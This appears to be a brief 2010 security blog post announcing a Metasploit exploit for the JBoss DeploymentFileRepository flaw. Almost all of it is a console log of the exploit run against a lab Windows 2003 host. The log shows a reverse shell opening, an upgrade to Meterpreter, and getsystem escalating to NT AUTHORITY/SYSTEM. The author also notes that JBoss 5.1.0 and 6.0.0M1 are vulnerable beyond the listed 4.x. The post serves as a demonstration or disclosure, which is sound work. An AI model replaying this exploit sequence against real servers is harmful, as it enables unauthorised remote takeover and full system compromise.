MC pushed out a new exploit today.
So while it lists 4.x as vulnerable, several other versions are actually vulnerable as well, including 6.0.0M1 and 5.1.0 :-)
msf exploit(jboss_deploymentfilerepository) > exploit
[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin>whoami
whoami
win2k3lab/administrator

C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin>^Z
Background session 3? [y/N] y
msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions
===============

Id  Type   Information  Connection
--  ----   -----------  ----------
3   shell               192.168.1.101:4444 -> 192.168.1.101:57796

msf exploit(jboss_deploymentfilerepository) > sessions -u 3
msf exploit(jboss_deploymentfilerepository) >
msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.101:36591) at Sun May 09 11:21:32 -0400 2010
msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions
===============

Id  Type         Information                            Connection
--  ----         -----------                            ----------
3   shell                                               192.168.1.101:4444 -> 192.168.1.101:57796
4   meterpreter  win2k3lab/Administrator @ win2k3lab    192.168.1.101:4444 -> 192.168.1.101:36591

msf exploit(jboss_deploymentfilerepository) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: win2k3lab/Administrator
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY/SYSTEM
meterpreter > pwd
C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin
meterpreter >